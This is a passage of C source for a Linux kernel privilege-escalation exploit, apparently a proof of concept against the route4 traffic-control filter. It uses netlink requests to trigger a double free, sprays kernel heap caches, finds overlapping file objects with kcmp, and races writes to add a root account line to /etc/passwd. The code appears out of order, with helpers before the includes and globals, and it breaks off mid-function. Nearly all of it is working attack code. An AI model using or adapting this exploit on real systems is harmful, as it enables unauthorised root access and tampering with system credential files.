 * Close the nest opened at `nest`: its rta_len becomes the distance from the
 * nest header to the current end of message `n`.  Returns n->nlmsg_len.
 */
int addattr_nest_end(struct nlmsghdr* n, struct rtattr* nest) {
    char* nest_begin = (char*)nest;
    char* msg_end = (char*)NLMSG_TAIL(n);

    nest->rta_len = msg_end - nest_begin;
    return n->nlmsg_len;
}
/*
 * add_qdisc() - send one RTM_NEWQDISC request on netlink socket `fd` that
 * creates an "sfq" root qdisc on interface index 1.
 *
 * Returns the result of sendmsg() (bytes sent, or -1 with errno set), or -1
 * if the request buffer cannot be allocated.
 */
int add_qdisc(int fd) {
    char* start = calloc(1, 0x1000);
    if (!start)
        return -1;
    struct nlmsghdr* msg = (struct nlmsghdr*)start;

    // new qdisc: nlmsghdr + tcmsg
    msg->nlmsg_len = NLMSG_LENGTH(sizeof(struct tcmsg));
    msg->nlmsg_flags = NLM_F_REQUEST | NLM_F_EXCL | NLM_F_CREATE;
    msg->nlmsg_type = RTM_NEWQDISC;
    struct tcmsg* t = (struct tcmsg*)(start + sizeof(struct nlmsghdr));
    // interface index 1 (presumably loopback in the fresh netns - TODO confirm)
    t->tcm_ifindex = 1;
    t->tcm_family = AF_UNSPEC;
    t->tcm_parent = TC_H_ROOT;
    // prio, protocol
    u_int32_t prio = 1;
    u_int32_t protocol = 1;
    t->tcm_info = TC_H_MAKE(prio << 16, protocol);

    // per the original note, sfq may not be enabled in every kernel config (qfq is the alternative)
    addattr_l(msg, 0x1000, TCA_KIND, "sfq", 4);

    struct iovec iov = { .iov_base = msg, .iov_len = msg->nlmsg_len };
    struct sockaddr_nl nladdr = { .nl_family = AF_NETLINK };
    struct msghdr msgh = {
        .msg_name = &nladdr,
        .msg_namelen = sizeof(nladdr),
        .msg_iov = &iov,
        .msg_iovlen = 1,
    };

    int sent = sendmsg(fd, &msgh, 0);
    int send_errno = errno;     /* keep sendmsg's errno across free() */

    free(start);
    errno = send_errno;
    return sent;
}
/*
 * Send one RTM_NEWTFILTER request for a "route" classifier on interface
 * index 1, carrying TCA_ROUTE4_FROM = `from` and TCA_ROUTE4_TO = `to`.
 *
 * `handle` goes into tcm_handle and `flags` is OR-ed with NLM_F_REQUEST.
 * Returns 1 once the request has been handed to sendmsg() (whose result is
 * not checked), or -1 if the request buffer cannot be allocated.
 */
int add_tc_(int fd, u_int32_t from, u_int32_t to, u_int32_t handle, u_int16_t flags) {
    char* start = calloc(1, 0x2000);
    if (!start)
        return -1;
    struct nlmsghdr* msg = (struct nlmsghdr*)start;

    // new filter
    msg->nlmsg_len = NLMSG_LENGTH(sizeof(struct tcmsg));
    msg->nlmsg_flags = NLM_F_REQUEST | flags;
    msg->nlmsg_type = RTM_NEWTFILTER;
    struct tcmsg* t = (struct tcmsg*)(start + sizeof(struct nlmsghdr));

    // prio, protocol
    u_int32_t prio = 1;
    u_int32_t protocol = 1;
    t->tcm_info = TC_H_MAKE(prio << 16, protocol);
    t->tcm_ifindex = 1;
    t->tcm_family = AF_UNSPEC;
    t->tcm_handle = handle;

    addattr_l(msg, 0x1000, TCA_KIND, "route", 6);
    struct rtattr* tail = addattr_nest(msg, 0x1000, TCA_OPTIONS);
    addattr_l(msg, 0x1000, TCA_ROUTE4_FROM, &from, 4);
    addattr_l(msg, 0x1000, TCA_ROUTE4_TO, &to, 4);
    addattr_nest_end(msg, tail);

    // packing
    struct iovec iov = { .iov_base = msg, .iov_len = msg->nlmsg_len };
    struct sockaddr_nl nladdr = { .nl_family = AF_NETLINK };
    struct msghdr msgh = {
        .msg_name = &nladdr,
        .msg_namelen = sizeof(nladdr),
        .msg_iov = &iov,
        .msg_iovlen = 1,
    };

    sendmsg(fd, &msgh, 0);
    free(start);
    return 1;
}
 
/*
 * Convenience wrapper around add_tc_(): FROM is 0, TO is `handle`, and the
 * filter handle passed on is (handle << 8) + handle.
 */
void add_tc(int sockfd, uint32_t handle, uint16_t flag) {
    const uint32_t filter_handle = (handle << 8) + handle;

    add_tc_(sockfd, 0, handle, filter_handle, flag);
}
 
/*
 * Combine `from` and `to` (each at most 0xff, enforced by assert) into a
 * handle: `to` in the low byte, `from` in bits 16-23.
 *
 * Returns 0 when the combined value is 0 or has bit 15 set, otherwise the
 * handle.  The 0x7f00 test is kept for parity with the original but can never
 * be true, since OR-ing a value with a subset of its own bits changes nothing.
 */
uint32_t calc_handle(uint32_t from, uint32_t to) {
    assert(from <= 0xff && to <= 0xff);

    const uint32_t handle = (from << 16) | to;

    if ((((handle & 0x7f00) | handle) != handle) ||
        handle == 0 ||
        (handle & 0x8000) != 0)
        return 0;

    return handle;
}
 
/*
 * Send one RTM_DELTFILTER request (NLM_F_ECHO set) for the "route" filter
 * with tcm_handle `handle` on interface index 1, then read one reply.
 *
 * Returns a 0x4000-byte heap buffer holding whatever recvmsg() delivered;
 * the CALLER must free() it.  Returns NULL if the buffer cannot be
 * allocated.  sendmsg()/recvmsg() results are not checked.
 */
void* delete_tc_(int sockfd, u_int32_t handle) {
    char* start = calloc(1, 0x4000);
    if (!start)
        return NULL;
    struct nlmsghdr* msg = (struct nlmsghdr*)start;

    // delete filter
    msg->nlmsg_len = NLMSG_LENGTH(sizeof(struct tcmsg));
    msg->nlmsg_flags = NLM_F_REQUEST | NLM_F_ECHO;
    msg->nlmsg_type = RTM_DELTFILTER;
    struct tcmsg* t = (struct tcmsg*)(start + sizeof(struct nlmsghdr));

    // prio, protocol
    u_int32_t prio = 1;
    u_int32_t protocol = 1;
    t->tcm_info = TC_H_MAKE(prio << 16, protocol);
    t->tcm_ifindex = 1;
    t->tcm_family = AF_UNSPEC;
    t->tcm_handle = handle;

    addattr_l(msg, 0x1000, TCA_KIND, "route", 6);
    struct rtattr* tail = addattr_nest(msg, 0x1000, TCA_OPTIONS);
    addattr_nest_end(msg, tail);

    // packing
    struct iovec iov = { .iov_base = msg, .iov_len = msg->nlmsg_len };
    struct sockaddr_nl nladdr = { .nl_family = AF_NETLINK };
    struct msghdr msgh = {
        .msg_name = &nladdr,
        .msg_namelen = sizeof(nladdr),
        .msg_iov = &iov,
        .msg_iovlen = 1,
    };

    sendmsg(sockfd, &msgh, 0);

    // reuse the same buffer (now cleared, full size) for the reply
    memset(start, 0, 0x4000);
    iov.iov_len = 0x4000;
    iov.iov_base = start;
    recvmsg(sockfd, &msgh, 0);

    if (msgh.msg_namelen != sizeof(nladdr))
        printf("[-] size of sender address is wrong\n");
    return start;
}
 
/*
 * Convenience wrapper around delete_tc_(): deletes the filter whose handle is
 * (handle << 8) + handle and discards the reply.
 */
void delete_tc(int sockfd, uint32_t handle) {
    /* delete_tc_() returns a heap buffer owned by the caller; release it. */
    free(delete_tc_(sockfd, ((handle) << 8) + (handle)));
}
 
/*
 * Send one RTM_NEWTFILTER request for a "basic" classifier whose ematch tree
 * contains spray_count / 2 TCF_EM_META matches.  Each match carries
 * `spray_data` (`spray_len` bytes) twice, as TCA_EM_META_LVALUE and
 * TCA_EM_META_RVALUE, so one request carries about spray_count copies of the
 * data.
 *
 * spray_len * spray_count must be below 0x3000 (asserted).
 * Returns 1 once the request has been handed to sendmsg() (whose result is
 * not checked), or -1 if a buffer cannot be allocated.
 */
int add_tc_basic(int fd, uint32_t handle, void* spray_data, size_t spray_len, int spray_count) {
    assert(spray_len * spray_count < 0x3000);
    char* start = calloc(1, 0x4000);
    char* data = malloc(0x3000);
    if (!start || !data) {
        free(data);
        free(start);
        return -1;
    }
    struct nlmsghdr* msg = (struct nlmsghdr*)start;

    // new filter: nlmsghdr + tcmsg
    msg->nlmsg_len = NLMSG_LENGTH(sizeof(struct tcmsg));
    msg->nlmsg_flags = NLM_F_REQUEST | NLM_F_CREATE;
    msg->nlmsg_type = RTM_NEWTFILTER;
    struct tcmsg* t = (struct tcmsg*)(start + sizeof(struct nlmsghdr));

    // prio, protocol
    u_int32_t prio = 1;
    u_int32_t protocol = 1;
    t->tcm_info = TC_H_MAKE(prio << 16, protocol);
    t->tcm_ifindex = 1;
    t->tcm_family = AF_UNSPEC;
    t->tcm_handle = handle;

    addattr_l(msg, 0x4000, TCA_KIND, "basic", 6);
    struct rtattr* tail = addattr_nest(msg, 0x4000, TCA_OPTIONS);
    struct rtattr* ema_tail = addattr_nest(msg, 0x4000, TCA_BASIC_EMATCHES);
    struct tcf_ematch_tree_hdr tree_hdr = { .nmatches = spray_count / 2,
                                           .progid = 0 };

    addattr_l(msg, 0x4000, TCA_EMATCH_TREE_HDR, &tree_hdr, sizeof(tree_hdr));
    struct rtattr* rt_match_tail = addattr_nest(msg, 0x4000, TCA_EMATCH_TREE_LIST);

    for (int i = 0; i < tree_hdr.nmatches; i++) {
        char* current;
        memset(data, 0, 0x3000);
        struct tcf_ematch_hdr* hdr = (struct tcf_ematch_hdr*)data;
        hdr->kind = TCF_EM_META;
        hdr->flags = TCF_EM_REL_AND;

        current = data + sizeof(*hdr);

        struct tcf_meta_hdr meta_hdr = {
            .left.kind = TCF_META_TYPE_VAR << 12 | TCF_META_ID_DEV,
            .right.kind = TCF_META_TYPE_VAR << 12 | TCF_META_ID_DEV,
        };

        // payload size is that of the struct being copied, not of the `hdr` pointer
        current += addattr(current, TCA_EM_META_HDR, &meta_hdr, sizeof(meta_hdr));
        current += addattr(current, TCA_EM_META_LVALUE, spray_data, spray_len);
        current += addattr(current, TCA_EM_META_RVALUE, spray_data, spray_len);

        // each match is added as attribute type i + 1
        addattr_l(msg, 0x4000, i + 1, data, current - data);
    }

    addattr_nest_end(msg, rt_match_tail);
    addattr_nest_end(msg, ema_tail);
    addattr_nest_end(msg, tail);

    // packing
    struct iovec iov = { .iov_base = msg, .iov_len = msg->nlmsg_len };
    struct sockaddr_nl nladdr = { .nl_family = AF_NETLINK };
    struct msghdr msgh = {
        .msg_name = &nladdr,
        .msg_namelen = sizeof(nladdr),
        .msg_iov = &iov,
        .msg_iovlen = 1,
    };
    sendmsg(fd, &msgh, 0);
    free(data);
    free(start);
    return 1;
}
 
/*
 * Send one RTM_DELTFILTER request (NLM_F_ECHO set) for the "basic" filter
 * with tcm_handle `handle` on interface index 1, then read one reply.
 *
 * Returns a 0x4000-byte heap buffer holding whatever recvmsg() delivered;
 * the CALLER must free() it.  Returns NULL if the buffer cannot be
 * allocated.  sendmsg()/recvmsg() results are not checked.
 */
void* delete_tc_basic(int sockfd, u_int32_t handle) {
    char* start = calloc(1, 0x4000);
    if (!start)
        return NULL;
    struct nlmsghdr* msg = (struct nlmsghdr*)start;

    // delete filter
    msg->nlmsg_len = NLMSG_LENGTH(sizeof(struct tcmsg));
    msg->nlmsg_flags = NLM_F_REQUEST | NLM_F_ECHO;
    msg->nlmsg_type = RTM_DELTFILTER;
    struct tcmsg* t = (struct tcmsg*)(start + sizeof(struct nlmsghdr));

    // prio, protocol
    u_int32_t prio = 1;
    u_int32_t protocol = 1;
    t->tcm_info = TC_H_MAKE(prio << 16, protocol);
    t->tcm_ifindex = 1;
    t->tcm_family = AF_UNSPEC;
    t->tcm_handle = handle;

    addattr_l(msg, 0x1000, TCA_KIND, "basic", 6);
    struct rtattr* tail = addattr_nest(msg, 0x1000, TCA_OPTIONS);
    addattr_nest_end(msg, tail);

    // packing
    struct iovec iov = { .iov_base = msg, .iov_len = msg->nlmsg_len };
    struct sockaddr_nl nladdr = { .nl_family = AF_NETLINK };
    struct msghdr msgh = {
        .msg_name = &nladdr,
        .msg_namelen = sizeof(nladdr),
        .msg_iov = &iov,
        .msg_iovlen = 1,
    };

    sendmsg(sockfd, &msgh, 0);

    // reuse the same buffer (now cleared, full size) for the reply
    memset(start, 0, 0x4000);
    iov.iov_len = 0x4000;
    iov.iov_base = start;
    recvmsg(sockfd, &msgh, 0);

    if (msgh.msg_namelen != sizeof(nladdr))
        printf("[-] size of sender address is wrong\n");

    return start;
}
// slow_write() —— thread 1: occupy the write lock (write plenty of data)
void* slow_write() {
    printf("[11-1] start slow write\\\\n");
    clock_t start, end;
    int fd = open("./uaf", 1);
    if (fd < 0) {
        perror("[-] error open uaf file");
        exit(-1);
    }
 
    unsigned long int addr = 0x30000000;
    int offset;
    for (offset = 0; offset < 0x80000 / 20; offset++) {     // mmap space [0x30000000, 0x30000000 + 0x1000 * 0x80000 / 20]
        void* r = mmap((void*)(addr + offset * 0x1000), 0x1000,
            PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS, 0, 0);
        if (r < 0)
            printf("[-] allocate failed at 0x%x\\\\n", offset);
    }
    assert(offset > 0);
 
    void* mem = (void*)(addr);
    memcpy(mem, "hhhhh", 5);
    struct iovec iov[20];
    for (int i = 0; i < 20; i++) { // write plenty of data (0x80000 * 0x1000 = 0x80 000 000 = 2GB)
        iov[i].iov_base = mem;
        iov[i].iov_len = offset * 0x1000;
    }
 
    run_write = 1;    // notifiy thread 2 (unprivileged `file`) begin to write evil data
    start = clock();
 
    if (writev(fd, iov, 20) < 0)
        perror("slow write");
    end = clock();
    double spent = (double)(end - start) / CLOCKS_PER_SEC;
    printf("[*] write done, spent %f s\\\\n", spent);
    run_write = 0;
}
// write_cmd() —— thread 2: write `content` through the descriptor stored in overlap_a
//
// Spins until slow_write() has set run_write, sets run_spray (exploit() waits on it) and
// then issues a single writev() of the NUL-terminated `content` buffer.
// Takes no argument and always returns NULL (it is used as a pthread start routine).
void* write_cmd() {
    struct iovec iov = { .iov_base = content, .iov_len = strlen(content) };

    while (!run_write) {}  // busy-wait for thread 1; run_write is a plain int, see the -O0 build note
    printf("[11-2] write evil data after the slow write\n");
    run_spray = 1;
    if (writev(overlap_a, &iov, 1) < 0)
        printf("[-] failed to write\n");
    return NULL;
}
 
// exploit() —— body of the main exploit process (run_exp() calls it right after pre_exploit()).
//
// The function takes turns with the process at the other end of pipe_child / pipe_parent:
// it blocks on a 2-byte read from pipe_child[0] before each of its own steps and answers
// with a 2-byte "OK" on pipe_parent[1]. In between it sends three add_tc_() requests
// (steps 3, 6, 9), opens spray_num_1 + up to spray_num_2 files, and uses kcmp(KCMP_FILE)
// to look for two descriptors that refer to the same file.
// The outcome is reported as one byte on pipe_main[1]; the function then sleeps forever
// and never returns.
void exploit() {
    char msg[0x10] = {};
    struct rlimit old_lim, lim, new_lim;    // only old_lim is used below

    // Get old limits
    if (getrlimit(RLIMIT_NOFILE, &old_lim) == 0)
        printf("Old limits -> soft limit= %ld \\\\t"
            " hard limit= %ld \\\\n",
            old_lim.rlim_cur, old_lim.rlim_max);
    pin_on_cpu(0);
    printf("[*] starting exploit, num of cores: %d\\\\n", cpu_cores);
    // open & setup the socket
    sockfd = socket(PF_NETLINK, SOCK_RAW, 0);
    assert(sockfd != -1);
    add_qdisc(sockfd);
    // 3. allocate a route4_filter (vulnerable object)
    //    wait for the peer's "OK" on pipe_child first
    if (read(pipe_child[0], msg, 2) != 2)
        err(1, "[-] read from parent");
    printf("[3] allocate the vulnerable filter\\\\n");
    add_tc_(sockfd, 0, 0, 0, NLM_F_EXCL | NLM_F_CREATE);  // handle = 0

    if (write(pipe_parent[1], "OK", 2) != 2)
        err(1, "[-] write to child");
    // 6. 1st free the route4_filter, return the `kmalloc-256` page to the page allocator
    if (read(pipe_child[0], msg, 2) != 2)
        err(1, "[-] read from parent");

    // free the object, to free the slab
    printf("[6] 1st freed the filter object\\\\n");
    // getchar();
    add_tc_(sockfd, 0x11, 0x12, 0, NLM_F_CREATE);         // handle = 0, no NLM_F_EXCL this time

    // wait for the vulnerable object being freed
    usleep(500 * 1000);
    if (write(pipe_parent[1], "OK", 2) != 2)
        err(1, "[-] write to child");
    // 8. spray spray_num_1 unprivileged `file` objects by opening ./data2 write-only
    if (read(pipe_child[0], msg, 2) != 2)
        err(1, "[-] read from parent");

    usleep(1000 * 1000);
    printf("[8] spray 4000 uprivileged `file`\\\\n");
    for (int i = 0; i < spray_num_1; i++) {
        pin_on_cpu(i % cpu_cores);          // rotate over all online CPUs
        fds[i] = open("./data2", 1);        // 1 == O_WRONLY
        assert(fds[i] > 0);
    }
    // printf("pause before 2nd free\\\\n");
    // getchar();
    // 9. 2nd free route4_filter, which will free the file
    printf("[9] 2nd free the filter object\\\\n");
    add_tc_(sockfd, 0x11, 0x13, 0, NLM_F_CREATE);         // handle = 0
    printf("pause after 2nd free\\\\n");
    // getchar();
    // sleep(10000);
    usleep(1000 * 100);   // should not sleep too long, otherwise file might be claimed by others

    // 10. spray up to spray_num_2 more `file` objects (./uaf, write-only) & find the overlapped file
    printf("[10] spraying 5000 unprivileged `file`\\\\n");
    for (int i = 0; i < spray_num_2; i++) {
        pin_on_cpu(i % cpu_cores);
        fd_2[i] = open("./uaf", 1);         // 1 == O_WRONLY
        assert(fd_2[i] > 0);
        for (int j = 0; j < spray_num_1; j++) {
            // 10-1. after each new open, compare it against every descriptor from step 8;
            //       kcmp(KCMP_FILE) returning 0 means both descriptors refer to the same file
            if (syscall(__NR_kcmp, getpid(), getpid(), KCMP_FILE, fds[j], fd_2[i]) == 0)
            {
                printf("[10-1] found overlapped file, id : %d, %d\\\\n", i, j);
                overlap_a = fds[j];
                overlap_b = fd_2[i];
                // 11. start 2 threads: Thread 1-take up write lock; Thread 2-write evil data
                printf("[11] start 2 threads compete to write\\\\n");
                pthread_t pid, pid2;
                pthread_create(&pid, NULL, slow_write, NULL);
                pthread_create(&pid2, NULL, write_cmd, NULL);

                while (!run_spray) {}   // busy-wait until write_cmd() sets run_spray
                // 12. spray privileged `file` object
                // NOTE(review): both descriptors were just reported as the same file, so it is
                // presumably released only once both are closed — confirm.
                close(overlap_a);
                close(overlap_b);

                usleep(1000 * 100);
                // ask the file-spray helper to start, then wait for its 2-byte answer
                int spray_num = 4096;
                write(pipe_file_spray[0][1], &spray_num, sizeof(int));
                if (read(pipe_file_spray[1][0], &msg, 2) != 2)
                    err(1, "[-] read from file spray");
                overlapped = true;
                // NOTE(review): there is no break here, so the inner loop keeps comparing the
                // remaining fds[j] after a match; only the outer loop stops (below).
            }
        }
        if (overlapped)
            break;
    }
    // 13. finish exploitation
    sleep(3);
    while (run_write) { sleep(1); }     // wait until slow_write() has cleared run_write
    printf("[13] check whether we overwrite the privileged file\\\\n");
    if (!overlapped) {
        printf("[-] no overlap found :(...\\\\n");
        write(pipe_main[1], "\\\\xff", 1);
    }
    else {
        int xx = open(target, 0);           // 0 == O_RDONLY
        char buf[0x100] = {};
        // check if user (hi) in the passwd
        read(xx, buf, 0x30);
        if (!strncmp(buf, "hi", 2))
            write(pipe_main[1], "\\\\x00", 1);
        else {
            printf("[-] not successful : %s\\\\n", buf);
            write(pipe_main[1], "\\\\xff", 1);
        }
    }
    while (1) { sleep(1000); }
}
 
// run_exp() —— create the notification pipes and fork the cooperating processes:
//   * a file-spray helper that blocks on pipe_file_spray[0] and then opens `target` repeatedly (step 12)
//   * the process that runs pre_exploit() followed by exploit()
//   * a defragmentation helper that opens `target` 10000 times (step 1)
//   * the calling process itself, which adds and deletes "basic" filters on its own
//     netlink socket (steps 2, 4, 5, 7) in lock-step with exploit() via pipe_child / pipe_parent
// Declared int, but no path reaches a return statement: every branch ends in an endless
// sleep loop (exploit() ends in one as well).
int run_exp() {
    // 0. initialize pipe as notifier
    if (pipe(pipe_parent) == -1)
        err(1, "[-] fail to create pipes\\\\n");
    if (pipe(pipe_child) == -1)
        err(1, "[-] fail to create pipes\\\\n");
    if (pipe(pipe_defrag) == -1)
        err(1, "[-] fail to create pipes\\\\n");
    if (pipe(pipe_file_spray[0]) == -1)   // begin spray file
        err(1, "[-] fail to create pipes\\\\n");
    if (pipe(pipe_file_spray[1]) == -1)   // end spray file
        err(1, "[-] fail to create pipes\\\\n");
    cpu_cores = sysconf(_SC_NPROCESSORS_ONLN);

    if (fork() == 0) {
        // 12. file-spray helper - open `target` 4096*2 times once exploit() asks for it (wait pipe_file_spray[0])
        adjust_rlimit();
        int spray_num = 0;
        // NOTE(review): read() returns a signed value that is compared with an unsigned sizeof,
        // so a -1 error return does not satisfy this "<" test.
        if (read(pipe_file_spray[0][0], &spray_num, sizeof(int)) < sizeof(int))   // use pipe_file_spray to notify
            err(1, "[-] read file spray");

        printf("[12] got cmd, start spraying 4096*2 `file` by opening %s\\\\n", target);
        spray_num = 4096;   // the value received over the pipe is overwritten here
        if (fork() == 0) {  // spray 4096 `file` in the child of this second fork
            for (int i = 0; i < spray_num; i++) {
                pin_on_cpu(i % cpu_cores);
                open(target, 0);
            }
            while (1) { sleep(10000); }   // keep the descriptors open
        }
        // spray 4096 `file` in the helper itself (the parent of the second fork)
        for (int i = 0; i < spray_num; i++) {
            pin_on_cpu(i % cpu_cores);
            open(target, 0);
        }
        printf("[*] spray done\\\\n");
        write(pipe_file_spray[1][1], "OK", 2);  // write pipe_file_spray[1] —— finish spray `file`
        while (1) { sleep(10000); }
        exit(0);    // not reached
    }
    // 0. preprocess & start main exploit
    if (fork() == 0) {
        pin_on_cpu(0);
        pre_exploit();  // set up process memory / working dir / namespace
        exploit();      // main exploit
    }
    else
    {
        sleep(2);
        if (fork() == 0)
        {
            // 1. defragmentation —— spray 10000 `file` to exhaust all file slabs for cross cache - all cores
            adjust_rlimit();
            printf("[1] defragmentation - spray 10000 `file` to exhaust all file slabs for cross cache\\\\n");
            for (int i = 0; i < 10000; i++) {
                pin_on_cpu(i % cpu_cores);
                open(target, 0);
            }

            // tell the spray process below that defragmentation is done
            if (write(pipe_defrag[1], "OK", 2) != 2)
                err(1, "[-] failed write defrag");
            while (1) { sleep(1000); }
        }
        else
        {
            // 2. spray thread - core 0         spray kmalloc-192 & kmalloc-256
            setup_namespace();
            pin_on_cpu(0);
            int sprayfd = socket(PF_NETLINK, SOCK_RAW, 0);
            assert(sprayfd != -1);
            add_qdisc(sprayfd);
            // 2-1. prepare payload: 16 zero bytes followed by 240 'A' bytes
            char msg[0x10] = {};
            char payload[256] = {};
            memset(payload + 0x10, 'A', 256 - 0x10);

            // wait for the defragmentation helper
            if (read(pipe_defrag[0], msg, 2) != 2)
                err(1, "[-] failed read defrag");

            // if the exploit keeps failing, please tune the middle and end
            int middle = 38;       // 38
            int end = middle + 40; // 40
            // 2-2. spray (38+3)*32 filters in kmalloc-192 & kmalloc-256
            //      (argument meaning is defined by add_tc_basic(), which is outside this function)
            printf("[2] spray (38+3)*32 kmalloc-192 & kmalloc-256\\\\n");
            for (int i = 0; i < middle; i++)
                add_tc_basic(sprayfd, i + 1, payload, 193, 32);

            add_tc_basic(sprayfd, middle + 1, payload, 193, 32);
            add_tc_basic(sprayfd, middle + 2, payload, 193, 32);
            add_tc_basic(sprayfd, middle + 3, payload, 193, 32);
            // let exploit() perform step 3
            if (write(pipe_child[1], "OK", 2) != 2)
                err(1, "[-] write to parent\\\\n");
            // 4. spray more filters in kmalloc-192 & kmalloc-256
            if (read(pipe_parent[0], msg, 2) != 2)
                err(1, "[-] read from parent");
            // add_tc_basic(sprayfd, middle+2, payload, 129, 32);

            // prepare another part for cross cache
            printf("[4] spray kmalloc-192 & kmalloc-256\\\\n");
            for (int i = middle + 2; i < end; i++)
                add_tc_basic(sprayfd, i + 1, payload, 193, 32);
            // 5. free (end-24)*32 kmalloc-192 & kmalloc-256
            printf("[5] free (end-24)*32 kmalloc-192 & kmalloc-256\\\\n");
            for (int i = 1; i < end - 24; i++) {
                // prevent double free of 192 and being reclaimed by others
                if (i == middle || i == middle + 1)
                    continue;
                delete_tc_basic(sprayfd, i + 1);    // returned reply buffer is not used
            }
            // let exploit() perform step 6
            if (write(pipe_child[1], "OK", 2) != 2)
                err(1, "[-] write to parent\\\\n");
            // 7. free (end-middle+1)*32 kmalloc-192 & kmalloc-256
            if (read(pipe_parent[0], msg, 2) != 2)
                err(1, "[-] read from parent");
            // if (cpu_cores == 1) sleep(1);
            printf("[7] free (end-middle+1)*32 kmalloc-192 & kmalloc-256\\\\n");
            delete_tc_basic(sprayfd, middle + 2);
            delete_tc_basic(sprayfd, middle + 3);
            delete_tc_basic(sprayfd, 1);
            for (int i = middle + 2; i < end; i++)
                delete_tc_basic(sprayfd, i + 1);
            //getchar();
            // let exploit() perform step 8
            if (write(pipe_child[1], "OK", 2) != 2)
                err(1, "[-] write to parent\\\\n");
            while (1) { sleep(1000); }
        }
    }
}
 
int main(int argc, char** argv) {
    global = (char*)mmap(NULL, 0x2000, PROT_READ | PROT_WRITE | PROT_EXEC,
        MAP_SHARED | MAP_ANON, -1, 0);
    memset(global, 0, 0x2000);
 
    self_path = global;
    snprintf(self_path, 0x100, "%s/%s", get_current_dir_name(), argv[0]);
    printf("[*] self path %s\\\\n", self_path);
    // prepare write data —— evil data + existing data in /etc/passwd
    printf("[*] prepare evil data\\\\n");
    int fd = open(target, 0);
    content = (char*)(global + 0x100);
    strcpy(content, overwrite);
    read(fd, content + strlen(overwrite), 0x1000);
    close(fd);
    // run_exp() in sub-process
    assert(pipe(pipe_main) == 0);
    if (fork() == 0) {
        run_exp();                  // main exploit
        while (1) { sleep(10000); }
    }
    // judge if succeed
    char data;
    read(pipe_main[0], &data, 1);
    if (data == 0)
        printf("[+] succeed\\\\n");
    else
        printf("[-] failed\\\\n");
}
// $ gcc -static -pthread -O0 ./exploit.c -o ./exploit
#define _GNU_SOURCE
#include <arpa/inet.h>
#include <assert.h>
#include <dirent.h>
#include <endian.h>
#include <errno.h>
#include <fcntl.h>
#include <net/if.h>
#include <net/if_arp.h>
#include <netinet/in.h>
#include <sched.h>
#include <signal.h>
#include <stdarg.h>
#include <stdbool.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/epoll.h>
#include <sys/ioctl.h>
#include <sys/ipc.h>
#include <sys/mount.h>
#include <sys/msg.h>
#include <sys/syscall.h>
#include <sys/time.h>
#include <sys/types.h>
#include <sys/uio.h>
#include <sys/wait.h>
#include <time.h>
#include <unistd.h>
 
#include <sys/shm.h>
#include <sys/stat.h>
#include <sys/timerfd.h>
 
#include <linux/tc_ematch/tc_em_meta.h>
#include <sys/resource.h>
 
#include <linux/capability.h>
#include <linux/futex.h>
#include <linux/genetlink.h>
#include <linux/if_addr.h>
#include <linux/if_ether.h>
#include <linux/if_link.h>
#include <linux/if_tun.h>
#include <linux/in6.h>
#include <linux/ip.h>
#include <linux/kcmp.h>
#include <linux/neighbour.h>
#include <linux/net.h>
#include <linux/netlink.h>
#include <linux/pkt_cls.h>
#include <linux/pkt_sched.h>
#include <linux/rtnetlink.h>
#include <linux/tcp.h>
#include <linux/veth.h>
 
#include <x86intrin.h>
#include <err.h>
#include <fcntl.h>
#include <poll.h>
#include <pthread.h>
#include <sys/mman.h>
#include <sys/utsname.h>
 
char* target = "/etc/passwd";                   // file opened by the spray helpers and re-read for the final check
char* overwrite = "hi:x:0:0:root:/:/bin/sh\n";  // alternative: "user:$1$user$k8sntSoh7jhsc6lwspjsU.:0:0:/root/root:/bin/bash\n"
char* global;                                   // shared mapping created in main()
char* self_path;                                // path of this binary, stored at the start of `global`
char* content;                                  // evil data + existing data in the target file

#define PAGE_SIZE 0x1000
#define MAX_FILE_NUM 0x8000

int fds[MAX_FILE_NUM] = {0};    // descriptors opened in the first spray
int fd_2[MAX_FILE_NUM] = {0};   // descriptors opened in the second spray
int overlap_a = -1;     // descriptor from fds[] that kcmp reported as sharing a file with overlap_b
int overlap_b = -1;     // descriptor from fd_2[] that kcmp reported as sharing a file with overlap_a

int cpu_cores = 0;      // num of cpu cores
int sockfd = -1;

int spray_num_1 = 2000; // 4000
int spray_num_2 = 4000; // 5000

int pipe_main[2];       // one result byte from the exploit process to main()
int pipe_parent[2];
int pipe_child[2];
int pipe_defrag[2];
int pipe_file_spray[2][2];      // [0]: start the file spray, [1]: file spray finished

// Plain ints that are polled across threads with busy loops; this relies on the
// unoptimised (-O0) build mentioned in the compile line.
int run_write = 0;      // set by slow_write() around its writev(); write_cmd() waits for it
int run_spray = 0;      // set by write_cmd(); exploit() waits for it
bool overlapped = false;
 
// print_hex() —— dump a buffer to stdout as 64-bit hexadecimal words, two words per row
//
// buf  : start of the data
// size : number of bytes; only the size / 8 complete words are printed
// Each row starts with its row index. The dump is framed by two ruler lines.
void print_hex(char* buf, int size) {
    int words = size / 8;

    puts("======================================");
    printf("data :\n");
    for (int i = 0; i < words; i++) {
        // copy the word out instead of dereferencing a cast pointer: buf need not be aligned
        unsigned long long word = 0;
        memcpy(&word, buf + (size_t)i * 8, 8);

        if (i % 2 == 0) {
            printf("%d", i / 2);
        }
        printf(" %16llx", word);
        if (i % 2 == 1) {
            printf("\n");
        }
    }
    // finish a row that holds only one word so the ruler starts on its own line
    if (words % 2 == 1) {
        printf("\n");
    }
    puts("======================================");
}
// pin_on_cpu() —— restrict the calling thread to the single CPU `cpu`
// Prints the sched_setaffinity() error and terminates the process if the call fails.
void pin_on_cpu(int cpu) {
    cpu_set_t only_this_cpu;

    CPU_ZERO(&only_this_cpu);
    CPU_SET(cpu, &only_this_cpu);

    int rc = sched_setaffinity(0, sizeof(only_this_cpu), &only_this_cpu);   // pid 0: the caller
    if (rc == 0)
        return;

    perror("sched_setaffinity()");
    exit(EXIT_FAILURE);
}
 
// write_file() —— format a string (printf-style, at most 1023 characters) and write it
// to an already existing file in one write() call.
//
// file : path, opened with O_WRONLY | O_CLOEXEC (the file is not created)
// what : printf-style format followed by its arguments
// returns true only when the whole string was written; on a failed or short write the
// errno value left by write() is preserved across close().
static bool write_file(const char* file, const char* what, ...) {
    char text[1024];
    va_list ap;

    va_start(ap, what);
    vsnprintf(text, sizeof(text), what, ap);
    va_end(ap);
    text[sizeof(text) - 1] = 0;

    int out = open(file, O_WRONLY | O_CLOEXEC);
    if (out == -1)
        return false;

    int want = strlen(text);
    bool complete = (write(out, text, want) == want);
    if (complete) {
        close(out);
        return true;
    }

    int saved = errno;      // close() may overwrite errno
    close(out);
    errno = saved;
